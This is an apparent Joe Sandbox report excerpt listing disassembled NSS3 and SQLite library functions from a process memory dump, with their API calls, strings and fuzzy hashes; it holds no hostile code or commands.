                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                            • String ID:
                                                            • API String ID: 1233137751-0
                                                            • Opcode ID: d087b2664996614aaf8bf9888f3097f47693f3eceeb3b684fdd31ef5dc62b1ab
                                                            • Instruction ID: 4c280345943bbc08da4dec267e4aa28d7dc0eff7f698ef2f8b83b97e829679a8
                                                            • Opcode Fuzzy Hash: d087b2664996614aaf8bf9888f3097f47693f3eceeb3b684fdd31ef5dc62b1ab
                                                            • Instruction Fuzzy Hash: B53168F29053129BEB108E9A9C40B5B76A8AF52348F19813DED19C7F00E732D9ACC7D1
                                                            Function 6CA63CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CA638BD), ref: 6CA63CBE
                                                            • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6CA638BD), ref: 6CA63CD1
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63CF0
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CB3B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63D0B
                                                            • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63D1A
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CB3B369,000000FF,00000000,00000000,00000000,6CA638BD), ref: 6CA63D38
                                                            • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6CA63D47
                                                            • free.MOZGLUE(00000000), ref: 6CA63D62
                                                            • free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6CA638BD), ref: 6CA63D6F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
                                                            • String ID:
                                                            • API String ID: 2345246809-0
                                                            • Opcode ID: a34c524b1000892ce4b98ec6335f4f270e406b5fd0d32b1f57b7d9d9e5eeee83
                                                            • Instruction ID: 23f0ff05fa04229fe2a13234accef225babb24c6addb3d84afc552b629bd37a2
                                                            • Opcode Fuzzy Hash: a34c524b1000892ce4b98ec6335f4f270e406b5fd0d32b1f57b7d9d9e5eeee83
                                                            • Instruction Fuzzy Hash: AB21DBB970211277FF106A7B8C09E7739ADDF866B4F180635B939D7AC0DA60D841C6B1
                                                            Function 6CA64DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CA6536F,00000022,?,?,00000000,?), ref: 6CA64E70
                                                            • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CA64F28
                                                            • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CA64F8E
                                                            • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CA64FAE
                                                            • free.MOZGLUE(?), ref: 6CA64FC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                            • String ID: %s=%c%s%c$%s=%s
                                                            • API String ID: 2709355791-2032576422
                                                            • Opcode ID: 69969d87dc01616e2a0f0767e61802447bc56d9a5dddc335c47744ba693e9023
                                                            • Instruction ID: 65501a48a5591041f0ad2ccce96f62112bf5ec3f22fd0d9b0e95a997094d341c
                                                            • Opcode Fuzzy Hash: 69969d87dc01616e2a0f0767e61802447bc56d9a5dddc335c47744ba693e9023
                                                            • Instruction Fuzzy Hash: B8512871A452858BEB02CA6BC4B07FF7FF59F46308F2C8126E894A7E41D32598C58791
                                                            Function 6C9A7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A7E27
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A7E67
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C9A7EED
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A7F2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 912837312-598938438
                                                            • Opcode ID: ebd165a9b0908317824bd522137908b3bc4cf71306c69835f8a08d0104c665f2
                                                            • Instruction ID: f9baaa8d28c0c2237a78e53880882b5f76d06ce972c5c5e8a1073d50ca2953c4
                                                            • Opcode Fuzzy Hash: ebd165a9b0908317824bd522137908b3bc4cf71306c69835f8a08d0104c665f2
                                                            • Instruction Fuzzy Hash: BA61F774A042559FCB04CFA5C891B6A37B6BF45318F2449A8EC085FB6AD730EC56CB90
                                                            Function 6C98FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C98FD7A
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C98FD94
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C98FE3C
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C98FE83
                                                              • Part of subcall function 6C98FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C98FEFA
                                                              • Part of subcall function 6C98FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C98FF3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 1169254434-598938438
                                                            • Opcode ID: 8700152d62069e91e60b673c2d0151a06881da9f304a1238a273a0b321033b3d
                                                            • Instruction ID: fd2320e473905eb63295a3c7ce5fc8ea898504f93fb8e4c844952b70c04bfc38
                                                            • Opcode Fuzzy Hash: 8700152d62069e91e60b673c2d0151a06881da9f304a1238a273a0b321033b3d
                                                            • Instruction Fuzzy Hash: 9F51AF74A01215DFCF04CFA9C890AAEB7B5FF48318F145469EA05ABB52E735EC54CBA0
                                                            Function 6CA18CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,6CA2124D,00000001), ref: 6CA18D19
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CA2124D,00000001), ref: 6CA18D32
                                                            • PL_ArenaRelease.NSS3(?,?,?,?,?,6CA2124D,00000001), ref: 6CA18D73
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CA2124D,00000001), ref: 6CA18D8C
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CA2124D,00000001), ref: 6CA18DBA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                            • String ID: KRAM$KRAM
                                                            • API String ID: 2419422920-169145855
                                                            • Opcode ID: 2f6b3b88276e61305244afdcb18d5106dbabcf4c05301cbf633674a811d71580
                                                            • Instruction ID: ac14603295c566f73fc4f5ccb9aeb283e784cb8a78a3f3322cafe9c540f91a00
                                                            • Opcode Fuzzy Hash: 2f6b3b88276e61305244afdcb18d5106dbabcf4c05301cbf633674a811d71580
                                                            • Instruction Fuzzy Hash: 10219FB5A187018FCB00EF78C58465AB7F1FF45318F1A896AD89887B01EB30D886CB91
                                                            Function 6CA3ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CA3ACE6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA3AD14
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA3AD23
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA3AD39
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                            • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                            • API String ID: 332880674-3521875567
                                                            • Opcode ID: 5bc7753053892b06e427501cc65eead6cd6ee32833d12d4fedbcfc757e72b596
                                                            • Instruction ID: 3dcc9c2de27d0ecdc217f1334bdb2d8c1f501bdae2ccfc95673f38f7b522fb75
                                                            • Opcode Fuzzy Hash: 5bc7753053892b06e427501cc65eead6cd6ee32833d12d4fedbcfc757e72b596
                                                            • Instruction Fuzzy Hash: 2B210A356001749FEF01DBA5ED98B7A337AAB42399F440025E80DD7A91DF389C89C793
                                                            Function 6CAD4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAD4DC3
                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAD4DE0
                                                            Strings
                                                            • API call with %s database connection pointer, xrefs: 6CAD4DBD
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD4DCB
                                                            • misuse, xrefs: 6CAD4DD5
                                                            • %s at line %d of [%.10s], xrefs: 6CAD4DDA
                                                            • invalid, xrefs: 6CAD4DB8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                            • API String ID: 632333372-2974027950
                                                            • Opcode ID: 41dbee9a130af2a320637c8037a9fe9d86040f08de75f6f8fc6eee410c3cda1d
                                                            • Instruction ID: 8422d2df0d25d01048e791cfaef3cf1a4028f147cbf5c6ce824c5fd645966d4a
                                                            • Opcode Fuzzy Hash: 41dbee9a130af2a320637c8037a9fe9d86040f08de75f6f8fc6eee410c3cda1d
                                                            • Instruction Fuzzy Hash: E0F0E929E246B43BDB004A15DC12F8737655F2233DF5B19E1ED887BE92E215F99082C1
                                                            Function 6CAD4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAD4E30
                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAD4E4D
                                                            Strings
                                                            • API call with %s database connection pointer, xrefs: 6CAD4E2A
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD4E38
                                                            • misuse, xrefs: 6CAD4E42
                                                            • %s at line %d of [%.10s], xrefs: 6CAD4E47
                                                            • invalid, xrefs: 6CAD4E25
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                            • API String ID: 632333372-2974027950
                                                            • Opcode ID: a8bec606367a49edd92415b6e53d2a8df249526841c1b9a459c017c63b437f3e
                                                            • Instruction ID: b9ab290dcfeaac487dbf4195c879b5d4aff93824b6f48c4b6632e5c4782f861e
                                                            • Opcode Fuzzy Hash: a8bec606367a49edd92415b6e53d2a8df249526841c1b9a459c017c63b437f3e
                                                            • Instruction Fuzzy Hash: 74F02719E949B93BEB100225DC11FC737A95B22339F5F95A1EE0C77E92DA0DF8A042D1
                                                            Function 6CA40C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(00000000,00000000,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?,?,00000000,?,?), ref: 6CA40CB3
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?), ref: 6CA40DC1
                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?), ref: 6CA40DEC
                                                              • Part of subcall function 6CA60F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA02AF5,?,?,?,?,?,6CA00A1B,00000000), ref: 6CA60F1A
                                                              • Part of subcall function 6CA60F10: malloc.MOZGLUE(00000001), ref: 6CA60F30
                                                              • Part of subcall function 6CA60F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA60F42
                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?), ref: 6CA40DFF
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CA41444,?,00000001,?,00000000), ref: 6CA40E16
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?), ref: 6CA40E53
                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?,?,6CA41444,?,?,00000000), ref: 6CA40E65
                                                            • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CA41444,?,00000001,?,00000000,00000000,?), ref: 6CA40E79
                                                              • Part of subcall function 6CA51560: TlsGetValue.KERNEL32(00000000,?,6CA20844,?), ref: 6CA5157A
                                                              • Part of subcall function 6CA51560: EnterCriticalSection.KERNEL32(?,?,?,6CA20844,?), ref: 6CA5158F
                                                              • Part of subcall function 6CA51560: PR_Unlock.NSS3(?,?,?,?,6CA20844,?), ref: 6CA515B2
                                                              • Part of subcall function 6CA1B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CA21397,00000000,?,6CA1CF93,5B5F5EC0,00000000,?,6CA21397,?), ref: 6CA1B1CB
                                                              • Part of subcall function 6CA1B1A0: free.MOZGLUE(5B5F5EC0,?,6CA1CF93,5B5F5EC0,00000000,?,6CA21397,?), ref: 6CA1B1D2
                                                              • Part of subcall function 6CA189E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CA188AE,-00000008), ref: 6CA18A04
                                                              • Part of subcall function 6CA189E0: EnterCriticalSection.KERNEL32(?), ref: 6CA18A15
                                                              • Part of subcall function 6CA189E0: memset.VCRUNTIME140(6CA188AE,00000000,00000132), ref: 6CA18A27
                                                              • Part of subcall function 6CA189E0: PR_Unlock.NSS3(?), ref: 6CA18A35
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                            • String ID:
                                                            • API String ID: 1601681851-0
                                                            • Opcode ID: 5d9c282da0f5bfa299015fe1a794069f9ce7b7e9775a250346624a38b5e03d79
                                                            • Instruction ID: 6aac908cb65cb94dfb130629d299f25129d00091b3271f35e2ccb346a9a3aa4b
                                                            • Opcode Fuzzy Hash: 5d9c282da0f5bfa299015fe1a794069f9ce7b7e9775a250346624a38b5e03d79
                                                            • Instruction Fuzzy Hash: 495105B6E002105FEB009F64DD81EBB37B8AF1521CF594024ED0597B02FB35ED9D96A2
                                                            Function 6CA19C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA18850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CA20715), ref: 6CA18859
                                                              • Part of subcall function 6CA18850: PR_NewLock.NSS3 ref: 6CA18874
                                                              • Part of subcall function 6CA18850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CA1888D
                                                            • PR_NewLock.NSS3 ref: 6CA19CAD
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            • TlsGetValue.KERNEL32 ref: 6CA19CE8
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA1ECEC,6CA22FCD,00000000,?,6CA22FCD,?), ref: 6CA19D01
                                                            • TlsGetValue.KERNEL32(?,?,?,6CA1ECEC,6CA22FCD,00000000,?,6CA22FCD,?), ref: 6CA19D38
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA1ECEC,6CA22FCD,00000000,?,6CA22FCD,?), ref: 6CA19D4D
                                                            • PR_Unlock.NSS3 ref: 6CA19D70
                                                            • PR_Unlock.NSS3 ref: 6CA19DC3
                                                            • PR_NewLock.NSS3 ref: 6CA19DDD
                                                              • Part of subcall function 6CA188D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA20725,00000000,00000058), ref: 6CA18906
                                                              • Part of subcall function 6CA188D0: EnterCriticalSection.KERNEL32(?), ref: 6CA1891A
                                                              • Part of subcall function 6CA188D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CA1894A
